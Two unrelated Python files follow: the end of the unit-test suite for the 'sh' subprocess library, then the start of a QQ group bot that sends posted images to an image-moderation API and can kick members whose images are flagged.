input.write("herpderp")
input.seek(0)
out = cat(_in=input)
self.assertEqual(out, "herpderp")
def test_internal_bufsize(self):
from sh import cat
output = cat(_in="a" * 1000, _internal_bufsize=100, _out_bufsize=0)
self.assertEqual(len(output), 100)
output = cat(_in="a" * 1000, _internal_bufsize=50, _out_bufsize=2)
self.assertEqual(len(output), 100)
def test_change_stdout_buffering(self):
py = create_tmp_test("""
import sys
import os
# this proves that we won't get the output into our callback until we send
# a newline
sys.stdout.write("switch ")
sys.stdout.flush()
sys.stdout.write("buffering\\n")
sys.stdout.flush()
sys.stdin.read(1)
sys.stdout.write("unbuffered")
sys.stdout.flush()
# this is to keep the output from being flushed by the process ending, which
# would ruin our test. we want to make sure we get the string "unbuffered"
# before the process ends, without writing a newline
sys.stdin.read(1)
""")
d = {
"newline_buffer_success": False,
"unbuffered_success": False,
}
def interact(line, stdin, process):
line = line.strip()
if not line:
return
if line == "switch buffering":
d["newline_buffer_success"] = True
process.change_out_bufsize(0)
stdin.put("a")
elif line == "unbuffered":
stdin.put("b")
d["unbuffered_success"] = True
return True
# start with line buffered stdout
pw_stars = python("-u", py.name, _out=interact, _out_bufsize=1)
pw_stars.wait()
self.assertTrue(d["newline_buffer_success"])
self.assertTrue(d["unbuffered_success"])
def test_callable_interact(self):
py = create_tmp_test("""
import sys
sys.stdout.write("line1")
""")
class Callable(object):
def __init__(self):
self.line = None
def __call__(self, line):
self.line = line
cb = Callable()
python(py.name, _out=cb)
self.assertEqual(cb.line, "line1")
def test_encoding(self):
return self.skipTest("what's the best way to test a different '_encoding' special keyword argument?")
def test_timeout(self):
import sh
from time import time
sleep_for = 3
timeout = 1
started = time()
try:
sh.sleep(sleep_for, _timeout=timeout).wait()
except sh.TimeoutException as e:
self.assertEqual(e.full_cmd, '/bin/sleep 3')
else:
self.fail("no timeout exception")
elapsed = time() - started
self.assertLess(abs(elapsed - timeout), 0.5)
def test_timeout_overstep(self):
started = time.time()
sh.sleep(1, _timeout=5)
elapsed = time.time() - started
self.assertLess(abs(elapsed - 1), 0.5)
def test_timeout_wait(self):
p = sh.sleep(3, _bg=True)
self.assertRaises(sh.TimeoutException, p.wait, timeout=1)
def test_timeout_wait_overstep(self):
p = sh.sleep(1, _bg=True)
p.wait(timeout=5)
def test_timeout_wait_negative(self):
p = sh.sleep(3, _bg=True)
self.assertRaises(RuntimeError, p.wait, timeout=-3)
def test_binary_pipe(self):
binary = b'\xec;\xedr\xdbF'
py1 = create_tmp_test("""
import sys
import os
sys.stdout = os.fdopen(sys.stdout.fileno(), "wb", 0)
sys.stdout.write(b'\\xec;\\xedr\\xdbF')
""")
py2 = create_tmp_test("""
import sys
import os
sys.stdin = os.fdopen(sys.stdin.fileno(), "rb", 0)
sys.stdout = os.fdopen(sys.stdout.fileno(), "wb", 0)
sys.stdout.write(sys.stdin.read())
""")
out = python(python(py1.name), py2.name)
self.assertEqual(out.stdout, binary)
# designed to trigger the "... (%d more, please see e.stdout)" output
# of the ErrorReturnCode class
def test_failure_with_large_output(self):
from sh import ErrorReturnCode_1
py = create_tmp_test("""
print("andrewmoffat" * 1000)
exit(1)
""")
self.assertRaises(ErrorReturnCode_1, python, py.name)
# designed to check that the ErrorReturnCode constructor does not raise
# a UnicodeDecodeError
def test_non_ascii_error(self):
from sh import ls, ErrorReturnCode
test = "/á"
# coerce to unicode
if IS_PY3:
pass
else:
test = test.decode("utf8")
self.assertRaises(ErrorReturnCode, ls, test)
def test_no_out(self):
py = create_tmp_test("""
import sys
sys.stdout.write("stdout")
sys.stderr.write("stderr")
""")
p = python(py.name, _no_out=True)
self.assertEqual(p.stdout, b"")
self.assertEqual(p.stderr, b"stderr")
self.assertTrue(p.process._pipe_queue.empty())
def callback(line): pass
p = python(py.name, _out=callback)
self.assertEqual(p.stdout, b"")
self.assertEqual(p.stderr, b"stderr")
self.assertTrue(p.process._pipe_queue.empty())
p = python(py.name)
self.assertEqual(p.stdout, b"stdout")
self.assertEqual(p.stderr, b"stderr")
self.assertFalse(p.process._pipe_queue.empty())
def test_tty_stdin(self):
py = create_tmp_test("""
import sys
sys.stdout.write(sys.stdin.read())
sys.stdout.flush()
""")
out = python(py.name, _in="test\n", _tty_in=True)
self.assertEqual("test\n", out)
def test_no_err(self):
py = create_tmp_test("""
import sys
sys.stdout.write("stdout")
sys.stderr.write("stderr")
""")
p = python(py.name, _no_err=True)
self.assertEqual(p.stderr, b"")
self.assertEqual(p.stdout, b"stdout")
self.assertFalse(p.process._pipe_queue.empty())
def callback(line): pass
p = python(py.name, _err=callback)
self.assertEqual(p.stderr, b"")
self.assertEqual(p.stdout, b"stdout")
self.assertFalse(p.process._pipe_queue.empty())
p = python(py.name)
self.assertEqual(p.stderr, b"stderr")
self.assertEqual(p.stdout, b"stdout")
self.assertFalse(p.process._pipe_queue.empty())
def test_no_pipe(self):
from sh import ls
# calling a command regular should fill up the pipe_queue
p = ls()
self.assertFalse(p.process._pipe_queue.empty())
# calling a command with a callback should not
def callback(line): pass
p = ls(_out=callback)
self.assertTrue(p.process._pipe_queue.empty())
# calling a command regular with no_pipe also should not
p = ls(_no_pipe=True)
self.assertTrue(p.process._pipe_queue.empty())
def test_decode_error_handling(self):
from functools import partial
py = create_tmp_test("""
# -*- coding: utf8 -*-
import sys
import os
sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb')
IS_PY3 = sys.version_info[0] == 3
if IS_PY3:
sys.stdout.write(bytes("te漢字st", "utf8"))
else:
sys.stdout.write("te漢字st")
""")
fn = partial(python, py.name, _encoding="ascii")
def s(fn): str(fn())
self.assertRaises(UnicodeDecodeError, s, fn)
p = python(py.name, _encoding="ascii", _decode_errors="ignore")
self.assertEqual(p, "test")
def test_signal_exception(self):
from sh import SignalException_15
def throw_terminate_signal():
py = create_tmp_test("""
import time
while True: time.sleep(1)
""")
to_kill = python(py.name, _bg=True)
to_kill.terminate()
to_kill.wait()
self.assertRaises(SignalException_15, throw_terminate_signal)
def test_signal_group(self):
child = create_tmp_test("""
import time
time.sleep(3)
""")
parent = create_tmp_test("""
import sys
import sh
python = sh.Command(sys.executable)
p = python("{child_file}", _bg=True, _new_session=False)
print(p.pid)
print(p.process.pgid)
p.wait()
""", child_file=child.name)
def launch():
p = python(parent.name, _bg=True, _iter=True)
child_pid = int(next(p).strip())
child_pgid = int(next(p).strip())
parent_pid = p.pid
parent_pgid = p.process.pgid
return p, child_pid, child_pgid, parent_pid, parent_pgid
def assert_alive(pid):
os.kill(pid, 0)
def assert_dead(pid):
self.assert_oserror(errno.ESRCH, os.kill, pid, 0)
# first let's prove that calling regular SIGKILL on the parent does
# nothing to the child, since the child was launched in the same process
# group (_new_session=False) and the parent is not a controlling process
p, child_pid, child_pgid, parent_pid, parent_pgid = launch()
assert_alive(parent_pid)
assert_alive(child_pid)
p.kill()
time.sleep(0.1)
assert_dead(parent_pid)
assert_alive(child_pid)
self.assertRaises(sh.SignalException_SIGKILL, p.wait)
assert_dead(child_pid)
# now let's prove that killing the process group kills both the parent
# and the child
p, child_pid, child_pgid, parent_pid, parent_pgid = launch()
assert_alive(parent_pid)
assert_alive(child_pid)
p.kill_group()
time.sleep(0.1)
assert_dead(parent_pid)
assert_dead(child_pid)
def test_pushd(self):
""" test basic pushd functionality """
old_wd1 = sh.pwd().strip()
old_wd2 = os.getcwd()
self.assertEqual(old_wd1, old_wd2)
self.assertNotEqual(old_wd1, tempdir)
with sh.pushd(tempdir):
new_wd1 = sh.pwd().strip()
new_wd2 = os.getcwd()
old_wd3 = sh.pwd().strip()
old_wd4 = os.getcwd()
self.assertEqual(old_wd3, old_wd4)
self.assertEqual(old_wd1, old_wd3)
self.assertEqual(new_wd1, tempdir)
self.assertEqual(new_wd2, tempdir)
def test_pushd_cd(self):
""" test that pushd works like pushd/popd with built-in cd correctly """
import sh
child = realpath(tempfile.mkdtemp())
try:
old_wd = os.getcwd()
with sh.pushd(tempdir):
self.assertEqual(tempdir, os.getcwd())
sh.cd(child)
self.assertEqual(child, os.getcwd())
self.assertEqual(old_wd, os.getcwd())
finally:
os.rmdir(child)
def test_cd_homedir(self):
orig = os.getcwd()
my_dir = os.path.realpath(os.path.expanduser("~")) # Use realpath because homedir may be a symlink
sh.cd()
self.assertNotEqual(orig, os.getcwd())
self.assertEqual(my_dir, os.getcwd())
def test_non_existant_cwd(self):
from sh import ls
# sanity check
non_exist_dir = join(tempdir, "aowjgoahewro")
self.assertFalse(exists(non_exist_dir))
self.assertRaises(sh.ForkException, ls, _cwd=non_exist_dir)
# https://github.com/amoffat/sh/issues/176
def test_baked_command_can_be_printed(self):
from sh import ls
ll = ls.bake("-l")
self.assertTrue(str(ll).endswith("/ls -l"))
# https://github.com/amoffat/sh/issues/185
def test_done_callback(self):
import time
class Callback(object):
def __init__(self):
self.called = False
self.exit_code = None
self.success = None
def __call__(self, p, success, exit_code):
self.called = True
self.exit_code = exit_code
self.success = success
py = create_tmp_test("""
from time import time, sleep
sleep(1)
print(time())
""")
callback = Callback()
p = python(py.name, _done=callback, _bg=True)
# do a little setup to prove that a command with a _done callback is run
# in the background
wait_start = time.time()
p.wait()
wait_elapsed = time.time() - wait_start
self.assertTrue(callback.called)
self.assertLess(abs(wait_elapsed - 1.0), 1.0)
self.assertEqual(callback.exit_code, 0)
self.assertTrue(callback.success)
def test_fork_exc(self):
from sh import ForkException
py = create_tmp_test("")
def fail():
raise RuntimeError("nooo")
self.assertRaises(ForkException, python, py.name, _preexec_fn=fail)
def test_new_session(self):
from threading import Event
py = create_tmp_test("""
import os
import time
pid = os.getpid()
pgid = os.getpgid(pid)
sid = os.getsid(pid)
stuff = [pid, pgid, sid]
print(",".join([str(el) for el in stuff]))
time.sleep(0.5)
""")
event = Event()
def handle(line, stdin, p):
pid, pgid, sid = line.strip().split(",")
pid = int(pid)
pgid = int(pgid)
sid = int(sid)
self.assertEqual(p.pid, pid)
self.assertEqual(pid, pgid)
self.assertEqual(p.pgid, pgid)
self.assertEqual(pgid, p.get_pgid())
self.assertEqual(pid, sid)
self.assertEqual(sid, pgid)
self.assertEqual(p.sid, sid)
self.assertEqual(sid, p.get_sid())
event.set()
# new session
p = python(py.name, _out=handle)
p.wait()
self.assertTrue(event.is_set())
event.clear()
def handle(line, stdin, p):
pid, pgid, sid = line.strip().split(",")
pid = int(pid)
pgid = int(pgid)
sid = int(sid)
test_pid = os.getpgid(os.getpid())
self.assertEqual(p.pid, pid)
self.assertNotEqual(test_pid, pgid)
self.assertEqual(p.pgid, pgid)
self.assertEqual(pgid, p.get_pgid())
self.assertNotEqual(pid, sid)
self.assertNotEqual(sid, pgid)
self.assertEqual(p.sid, sid)
self.assertEqual(sid, p.get_sid())
event.set()
# no new session
p = python(py.name, _out=handle, _new_session=False)
p.wait()
self.assertTrue(event.is_set())
def test_done_cb_exc(self):
from sh import ErrorReturnCode
class Callback(object):
def __init__(self):
self.called = False
self.success = None
def __call__(self, p, success, exit_code):
self.success = success
self.called = True
py = create_tmp_test("exit(1)")
callback = Callback()
try:
p = python(py.name, _done=callback, _bg=True)
p.wait()
except ErrorReturnCode:
self.assertTrue(callback.called)
self.assertFalse(callback.success)
else:
self.fail("command should've thrown an exception")
def test_callable_stdin(self):
py = create_tmp_test("""
import sys
sys.stdout.write(sys.stdin.read())
""")
def create_stdin():
state = {"count": 0}
def stdin():
count = state["count"]
if count == 4:
return None
state["count"] += 1
return str(count)
return stdin
out = python(py.name, _in=create_stdin())
self.assertEqual("0123", out)
def test_stdin_unbuffered_bufsize(self):
from time import sleep
# this tries to receive some known data and measures the time it takes
# to receive it. since stdin is unbuffered, each chunk is forwarded to the
# child as soon as it is yielded, without waiting for a newline
py = create_tmp_test("""
import sys
from time import time
started = time()
data = sys.stdin.read(len("testing"))
waited = time() - started
sys.stdout.write(data + "\\n")
sys.stdout.write(str(waited) + "\\n")
started = time()
data = sys.stdin.read(len("done"))
waited = time() - started
sys.stdout.write(data + "\\n")
sys.stdout.write(str(waited) + "\\n")
sys.stdout.flush()
""")
def create_stdin():
yield "test"
sleep(1)
yield "ing"
sleep(1)
yield "done"
out = python(py.name, _in=create_stdin(), _in_bufsize=0)
word1, time1, word2, time2, _ = out.split("\n")
time1 = float(time1)
time2 = float(time2)
self.assertEqual(word1, "testing")
self.assertLess(abs(1 - time1), 0.5)
self.assertEqual(word2, "done")
self.assertLess(abs(1 - time2), 0.5)
def test_stdin_newline_bufsize(self):
from time import sleep
# this tries to receive some known data and measures the time it takes
# to receive it. since we're flushing by newline, we should only be
# able to receive the data when a newline is fed in
py = create_tmp_test("""
import sys
from time import time
started = time()
data = sys.stdin.read(len("testing\\n"))
waited = time() - started
sys.stdout.write(data)
sys.stdout.write(str(waited) + "\\n")
started = time()
data = sys.stdin.read(len("done\\n"))
waited = time() - started
sys.stdout.write(data)
sys.stdout.write(str(waited) + "\\n")
sys.stdout.flush()
""")
# we'll feed in text incrementally, sleeping strategically before
# sending a newline. we then measure the amount that we slept
# indirectly in the child process
def create_stdin():
yield "test"
sleep(1)
yield "ing\n"
sleep(1)
yield "done\n"
out = python(py.name, _in=create_stdin(), _in_bufsize=1)
word1, time1, word2, time2, _ = out.split("\n")
time1 = float(time1)
time2 = float(time2)
self.assertEqual(word1, "testing")
self.assertLess(abs(1 - time1), 0.5)
self.assertEqual(word2, "done")
self.assertLess(abs(1 - time2), 0.5)
def test_custom_timeout_signal(self):
from sh import TimeoutException
import signal
py = create_tmp_test("""
import time
time.sleep(3)
""")
try:
python(py.name, _timeout=1, _timeout_signal=signal.SIGQUIT)
except TimeoutException as e:
self.assertEqual(e.exit_code, signal.SIGQUIT)
else:
self.fail("we should have handled a TimeoutException")
def test_append_stdout(self):
py = create_tmp_test("""
import sys
num = sys.stdin.read()
sys.stdout.write(num)
""")
append_file = tempfile.NamedTemporaryFile(mode="a+b")
python(py.name, _in="1", _out=append_file)
python(py.name, _in="2", _out=append_file)
append_file.seek(0)
output = append_file.read()
self.assertEqual(b"12", output)
def test_shadowed_subcommand(self):
py = create_tmp_test("""
import sys
sys.stdout.write(sys.argv[1])
""")
out = python.bake(py.name).bake_()
self.assertEqual("bake", out)
def test_no_proc_no_attr(self):
py = create_tmp_test("")
with python(py.name) as p:
self.assertRaises(AttributeError, getattr, p, "exit_code")
def test_partially_applied_callback(self):
from functools import partial
py = create_tmp_test("""
for i in range(10):
print(i)
""")
output = []
def fn(foo, line):
output.append((foo, int(line.strip())))
log_line = partial(fn, "hello")
python(py.name, _out=log_line)
self.assertEqual(output, [("hello", i) for i in range(10)])
output = []
def fn(foo, line, stdin, proc):
output.append((foo, int(line.strip())))
log_line = partial(fn, "hello")
python(py.name, _out=log_line)
self.assertEqual(output, [("hello", i) for i in range(10)])
# https://github.com/amoffat/sh/issues/266
def test_grandchild_no_sighup(self):
import time
# child process that will write to a file if it receives a SIGHUP
child = create_tmp_test("""
import signal
import sys
import time
output_file = sys.argv[1]
with open(output_file, "w") as f:
def handle_sighup(signum, frame):
f.write("got signal %d" % signum)
sys.exit(signum)
signal.signal(signal.SIGHUP, handle_sighup)
time.sleep(2)
f.write("made it!\\n")
""")
# the parent that will terminate before the child writes to the output
# file, potentially causing a SIGHUP
parent = create_tmp_test("""
import os
import time
import sys
child_file = sys.argv[1]
output_file = sys.argv[2]
python_name = os.path.basename(sys.executable)
os.spawnlp(os.P_NOWAIT, python_name, python_name, child_file, output_file)
time.sleep(1) # give child a chance to set up
""")
output_file = tempfile.NamedTemporaryFile(delete=True)
python(parent.name, child.name, output_file.name)
time.sleep(3)
out = output_file.readlines()[0]
self.assertEqual(out, b"made it!\n")
def test_unchecked_producer_failure(self):
from sh import ErrorReturnCode_2
producer = create_tmp_test("""
import sys
for i in range(10):
print(i)
sys.exit(2)
""")
consumer = create_tmp_test("""
import sys
for line in sys.stdin:
pass
""")
direct_pipe = python(producer.name, _piped=True)
self.assertRaises(ErrorReturnCode_2, python, direct_pipe, consumer.name)
def test_unchecked_pipeline_failure(self):
# similar to test_unchecked_producer_failure, but this
# tests a multi-stage pipeline
from sh import ErrorReturnCode_2
producer = create_tmp_test("""
import sys
for i in range(10):
print(i)
sys.exit(2)
""")
middleman = create_tmp_test("""
import sys
for line in sys.stdin:
print("> " + line)
""")
consumer = create_tmp_test("""
import sys
for line in sys.stdin:
pass
""")
producer_normal_pipe = python(producer.name, _piped=True)
middleman_normal_pipe = python(producer_normal_pipe, middleman.name, _piped=True)
self.assertRaises(ErrorReturnCode_2, python, middleman_normal_pipe, consumer.name)
@skip_unless(HAS_MOCK, "requires unittest.mock")
class MockTests(BaseTests):
def test_patch_command_cls(self):
def fn():
cmd = sh.Command("afowejfow")
return cmd()
@unittest.mock.patch("sh.Command")
def test(Command):
Command().return_value = "some output"
return fn()
self.assertEqual(test(), "some output")
self.assertRaises(sh.CommandNotFound, fn)
def test_patch_command(self):
def fn():
return sh.afowejfow()
@unittest.mock.patch("sh.afowejfow", create=True)
def test(cmd):
cmd.return_value = "some output"
return fn()
self.assertEqual(test(), "some output")
self.assertRaises(sh.CommandNotFound, fn)
class MiscTests(BaseTests):
def test_pickling(self):
import pickle
py = create_tmp_test("""
import sys
sys.stdout.write("some output")
sys.stderr.write("some error")
exit(1)
""")
try:
python(py.name)
except sh.ErrorReturnCode as e:
restored = pickle.loads(pickle.dumps(e))
self.assertEqual(restored.stdout, b"some output")
self.assertEqual(restored.stderr, b"some error")
self.assertEqual(restored.exit_code, 1)
else:
self.fail("Didn't get an exception")
@requires_poller("poll")
def test_fd_over_1024(self):
py = create_tmp_test("""print("hi world")""")
with ulimit(resource.RLIMIT_NOFILE, 2048):
cutoff_fd = 1024
pipes = []
for i in xrange(cutoff_fd):
master, slave = os.pipe()
pipes.append((master, slave))
if slave >= cutoff_fd:
break
python(py.name)
for master, slave in pipes:
os.close(master)
os.close(slave)
def test_args_deprecated(self):
self.assertRaises(DeprecationWarning, sh.args, _env={})
def test_percent_doesnt_fail_logging(self):
""" test that a command name doesn't interfere with string formatting in
the internal loggers """
py = create_tmp_test("""
print("cool")
""")
python(py.name, "%")
python(py.name, "%%")
python(py.name, "%%%")
# TODO
# for some reason, i can't get a good stable baseline measured in this test
# on osx. so skip it for now if osx
@not_macos
@requires_progs("lsof")
def test_no_fd_leak(self):
import sh
import os
from itertools import product
# options whose combinations can possibly cause fd leaks
kwargs = {
"_tty_out": (True, False),
"_tty_in": (True, False),
"_err_to_out": (True, False),
}
def get_opts(possible_values):
all_opts = []
for opt, values in possible_values.items():
opt_collection = []
all_opts.append(opt_collection)
for val in values:
pair = (opt, val)
opt_collection.append(pair)
for combo in product(*all_opts):
opt_dict = {}
for key, val in combo:
opt_dict[key] = val
yield opt_dict
test_pid = os.getpid()
def get_num_fds():
lines = sh.lsof(p=test_pid).strip().split("\n")
def test(line):
line = line.upper()
return "CHR" in line or "PIPE" in line
lines = [line for line in lines if test(line)]
return len(lines) - 1
py = create_tmp_test("")
def test_command(**opts):
python(py.name, **opts)
# run the command once up front so the fd baseline is stable before we start measuring
test_command()
baseline = get_num_fds()
for i in xrange(10):
test_command()
num_fds = get_num_fds()
self.assertEqual(baseline, num_fds)
for opts in get_opts(kwargs):
for i in xrange(2):
test_command(**opts)
num_fds = get_num_fds()
self.assertEqual(baseline, num_fds, (baseline, num_fds, opts))
def test_pushd_thread_safety(self):
import threading
import time
temp1 = realpath(tempfile.mkdtemp())
temp2 = realpath(tempfile.mkdtemp())
try:
results = [None, None]
def fn1():
with sh.pushd(temp1):
time.sleep(0.2)
results[0] = realpath(os.getcwd())
def fn2():
time.sleep(0.1)
with sh.pushd(temp2):
results[1] = realpath(os.getcwd())
time.sleep(0.3)
t1 = threading.Thread(name="t1", target=fn1)
t2 = threading.Thread(name="t2", target=fn2)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(results, [temp1, temp2])
finally:
os.rmdir(temp1)
os.rmdir(temp2)
def test_stdin_nohang(self):
py = create_tmp_test("""
print("hi")
""")
read, write = os.pipe()
stdin = os.fdopen(read, "r")
python(py.name, _in=stdin)
@requires_utf8
def test_unicode_path(self):
from sh import Command
python_name = os.path.basename(sys.executable)
py = create_tmp_test("""#!/usr/bin/env {0}
# -*- coding: utf8 -*-
print("字")
""".format(python_name), prefix="字", delete=False)
try:
py.close()
os.chmod(py.name, int(0o755))
cmd = Command(py.name)
# all of these should behave just fine
str(cmd)
repr(cmd)
unicode(cmd)
running = cmd()
str(running)
repr(running)
unicode(running)
str(running.process)
repr(running.process)
unicode(running.process)
finally:
os.unlink(py.name)
# https://github.com/amoffat/sh/issues/121
def test_wraps(self):
from sh import ls
wraps(ls)(lambda f: True)
def test_signal_exception_aliases(self):
""" proves that signal exceptions with numbers and names are equivalent
"""
import signal
import sh
sig_name = "SignalException_%d" % signal.SIGQUIT
sig = getattr(sh, sig_name)
from sh import SignalException_SIGQUIT
self.assertEqual(sig, SignalException_SIGQUIT)
def test_change_log_message(self):
py = create_tmp_test("""
print("cool")
""")
def log_msg(cmd, call_args, pid=None):
return "Hi! I ran something"
buf = StringIO()
handler = logging.StreamHandler(buf)
logger = logging.getLogger("sh")
logger.setLevel(logging.INFO)
try:
logger.addHandler(handler)
python(py.name, "meow", "bark", _log_msg=log_msg)
finally:
logger.removeHandler(handler)
loglines = buf.getvalue().split("\n")
self.assertTrue(loglines, "Log handler captured no messages?")
self.assertTrue(loglines[0].startswith("Hi! I ran something"))
# https://github.com/amoffat/sh/issues/273
def test_stop_iteration_doesnt_block(self):
""" proves that calling calling next() on a stopped iterator doesn't
hang. """
py = create_tmp_test("""
print("cool")
""")
p = python(py.name, _iter=True)
for i in range(100):
try:
next(p)
except StopIteration:
pass
# https://github.com/amoffat/sh/issues/195
def test_threaded_with_contexts(self):
import threading
import time
py = create_tmp_test("""
import sys
a = sys.argv
res = (a[1], a[3])
sys.stdout.write(repr(res))
""")
p1 = python.bake("-u", py.name, 1)
p2 = python.bake("-u", py.name, 2)
results = [None, None]
def f1():
with p1:
time.sleep(1)
results[0] = str(system_python("one"))
def f2():
with p2:
results[1] = str(system_python("two"))
t1 = threading.Thread(target=f1)
t1.start()
t2 = threading.Thread(target=f2)
t2.start()
t1.join()
t2.join()
correct = [
"('1', 'one')",
"('2', 'two')",
]
self.assertEqual(results, correct)
# https://github.com/amoffat/sh/pull/292
def test_eintr(self):
import signal
def handler(num, frame): pass
signal.signal(signal.SIGALRM, handler)
py = create_tmp_test("""
import time
time.sleep(2)
""")
p = python(py.name, _bg=True)
signal.alarm(1)
p.wait()
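# StreamBufferer buffer sizes: 0 = unbuffered, 1 = newline-buffered, N > 1 = fixed N-byte chunks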
class StreamBuffererTests(unittest.TestCase):
def test_unbuffered(self):
from sh import _disable_whitelist # noqa: F401
from sh import StreamBufferer
b = StreamBufferer(0)
self.assertEqual(b.process(b"test"), [b"test"])
self.assertEqual(b.process(b"one"), [b"one"])
self.assertEqual(b.process(b""), [b""])
self.assertEqual(b.flush(), b"")
def test_newline_buffered(self):
from sh import _disable_whitelist # noqa: F401
from sh import StreamBufferer
b = StreamBufferer(1)
self.assertEqual(b.process(b"testing\none\ntwo"), [b"testing\n", b"one\n"])
self.assertEqual(b.process(b"\nthree\nfour"), [b"two\n", b"three\n"])
self.assertEqual(b.flush(), b"four")
def test_chunk_buffered(self):
from sh import _disable_whitelist # noqa: F401
from sh import StreamBufferer
b = StreamBufferer(10)
self.assertEqual(b.process(b"testing\none\ntwo"), [b"testing\non"])
self.assertEqual(b.process(b"\nthree\n"), [b"e\ntwo\nthre"])
self.assertEqual(b.flush(), b"e\n")
@requires_posix
class ExecutionContextTests(unittest.TestCase):
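# calling the sh module itself, e.g. sh(_out=out), returns a module clone with those special kwargs baked into every command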
def test_basic(self):
import sh
out = StringIO()
_sh = sh(_out=out)
_sh.echo("-n", "TEST")
self.assertEqual("TEST", out.getvalue())
def test_no_interfere1(self):
import sh
out = StringIO()
_sh = sh(_out=out) # noqa: F841
from _sh import echo
echo("-n", "TEST")
self.assertEqual("TEST", out.getvalue())
# Emptying the StringIO
out.seek(0)
out.truncate(0)
sh.echo("-n", "KO")
self.assertEqual("", out.getvalue())
def test_no_interfere2(self):
import sh
out = StringIO()
from sh import echo
_sh = sh(_out=out) # noqa: F841
echo("-n", "TEST")
self.assertEqual("", out.getvalue())
def test_no_bad_name(self):
out = StringIO()
def fn():
import sh
sh = sh(_out=out)
self.assertRaises(RuntimeError, fn)
def test_set_in_parent_function(self):
import sh
out = StringIO()
_sh = sh(_out=out)
def nested1():
_sh.echo("-n", "TEST1")
def nested2():
import sh
sh.echo("-n", "TEST2")
nested1()
nested2()
self.assertEqual("TEST1", out.getvalue())
def test_reimport_no_interfere(self):
import sh
out = StringIO()
_sh = sh(_out=out)
import _sh # this reimports '_sh' from the eponymous local variable
_sh.echo("-n", "TEST")
self.assertEqual("TEST", out.getvalue())
def test_importer_detects_module_name(self):
import sh
_sh = sh()
omg = _sh # noqa: F841
from omg import cat # noqa: F401
def test_importer_only_works_with_sh(self):
def unallowed_import():
_os = os # noqa: F841
from _os import path # noqa: F401
self.assertRaises(ImportError, unallowed_import)
def test_reimport_from_cli(self):
# The REPL and CLI both need special handling to create an execution context that is safe to
# reimport
if IS_PY3:
cmdstr = '; '.join(('import sh, io, sys',
'out = io.StringIO()',
'_sh = sh(_out=out)',
'import _sh',
'_sh.echo("-n", "TEST")',
'sys.stderr.write(out.getvalue())',
))
else:
cmdstr = '; '.join(('import sh, StringIO, sys',
'out = StringIO.StringIO()',
'_sh = sh(_out=out)',
'import _sh',
'_sh.echo("-n", "TEST")',
'sys.stderr.write(out.getvalue())',
))
err = StringIO()
python('-c', cmdstr, _err=err)
self.assertEqual('TEST', err.getvalue())
if __name__ == "__main__":
root = logging.getLogger()
root.setLevel(logging.DEBUG)
root.addHandler(NullHandler())
test_kwargs = {}
if IS_PY2 and MINOR_VER != 6:
test_kwargs["failfast"] = True
test_kwargs["verbosity"] = 2
try:
# if we're running a specific test, we can let the unittest framework figure out
# that test and run it itself. it will also handle setting the return code
# of the process if any tests error or fail
if len(sys.argv) > 1:
unittest.main(**test_kwargs)
# otherwise, it looks like we want to run all the tests
else:
suite = unittest.TestLoader().loadTestsFromModule(sys.modules[__name__])
test_kwargs["verbosity"] = 2
result = unittest.TextTestRunner(**test_kwargs).run(suite)
if not result.wasSuccessful():
exit(1)
finally:
if cov:
cov.stop()
cov.save()
|
main.py
|
import re
import base64
import time
import configparser
import requests
import hashlib
import threading
from urllib.parse import urlencode
from io import BytesIO
from PIL import Image
from queue import Queue
import cqhttp_helper as cq
from config import bot_host, bot_port, bot_img_file_dir, APP_ID, APP_KEY, qq_group, rules, compress_kb
bot = cq.CQHttp(api_root='http://127.0.0.1:5700/')
q = Queue()
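# queue of images awaiting moderation; filled by the group-message handler, drained by the worker thread started below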
@bot.on_message('group')
def handle_group_msg(context):
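# only scan images posted by ordinary members in the configured groups; GIFs are skipped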
if context['sender']['role'] == 'member' and context['group_id'] in qq_group:
has_img, files = parse(context['message'])
if has_img:
for file in files:
if file.endswith('.gif'):
continue
q.put({
'user_id': context['user_id'],
'message_id': context['message_id'],
'group_id': context['group_id'],
'file': file
})
def parse(msg):
"""
Check whether the message contains any images.
:param msg: the raw message string
:return: whether images are present, and the matched image file names
"""
reg = re.findall('\\[CQ:image,file=(.*?),url=.*?\\]', msg)
return len(reg) > 0, reg
def compress(file):
"""
Download the image and, if it is larger than compress_kb, downscale it repeatedly (base64 encoding inflates the data)
:param file: image file name
:return: the base64-encoded image data and the image md5
"""
conf = configparser.ConfigParser()
conf.read(f'{bot_img_file_dir}\\{file}.cqimg')
o_size = int(conf.get('image', 'size')) / 1024
md5 = conf.get('image', 'md5')
img_url = conf.get('image', 'url')
img_bin = requests.get(img_url).content
im = Image.open(BytesIO(img_bin))
while o_size > compress_kb:
width, height = im.size
im = im.resize((int(width * 0.5), int(height * 0.5)), Image.ANTIALIAS)
im.save(f'./tmp/{md5}.{file.split(".")[-1]}')
with open(f'./tmp/{md5}.{file.split(".")[-1]}', 'rb') as f:
img_bin = f.read()
o_size = len(img_bin) / 1024
im = Image.open(BytesIO(img_bin))
return base64.b64encode(img_bin).decode('utf-8'), md5
def sign(body: dict):
"""
Compute the API request signature.
:param body: request parameters
:return: the signature string
"""
b = urlencode(sorted(body.items(), key=lambda value: value[0]))
b += '&app_key=' + APP_KEY
return str(hashlib.md5(b.encode()).hexdigest()).upper()
def distinguish(data: str, md5: str):
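# call the vision_porn moderation API, retrying on failure; returns a dict mapping tag_name -> confidence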
while True:
try:
body = {
'app_id': APP_ID,
'time_stamp': int(time.time()),
'nonce_str': md5,
'image': data
}
body['sign'] = sign(body)
rsp = requests.post(url='https://api.ai.qq.com/fcgi-bin/vision/vision_porn',
data=body,
headers={'Content-Type': 'application/x-www-form-urlencoded'}).json()
result = {}
if rsp['ret'] == 0:
for v in rsp['data']['tag_list']:
result[v['tag_name']] = v['tag_confidence']
return result
except Exception as e:
print('Image moderation request failed:', e, 'retrying in 5 seconds')
time.sleep(5)
def main():
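# worker loop: sleep 3 seconds before handling each queued image (simple API throttling), then apply any matching rule's punishment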
while True:
try:
# poll until a task is available
while q.empty():
time.sleep(3)
task = q.get()
result = distinguish(*compress(task['file']))
print(f'Result: user {task["user_id"]} porn {result["porn"]}% sexy {result["hot"]}% overall {result["normal_hot_porn"]}%')
for rule in rules:
tag = rule['tag_name']
percent = result[tag]
if rule['tag_min'] <= percent <= rule['tag_max']:
message = "[CQ:at,qq={}]\nThis image was flagged as a likely violation with {}% confidence\nPunishment applied: {}\nIf this is a false positive, please contact an admin"
punishment = ""
if rule['punishment']['p'] == 'kick':
punishment = 'removal from this group'
bot.set_group_kick(group_id=task['group_id'], user_id=task['user_id'],
reject_add_request=rule['punishment']['reject'])
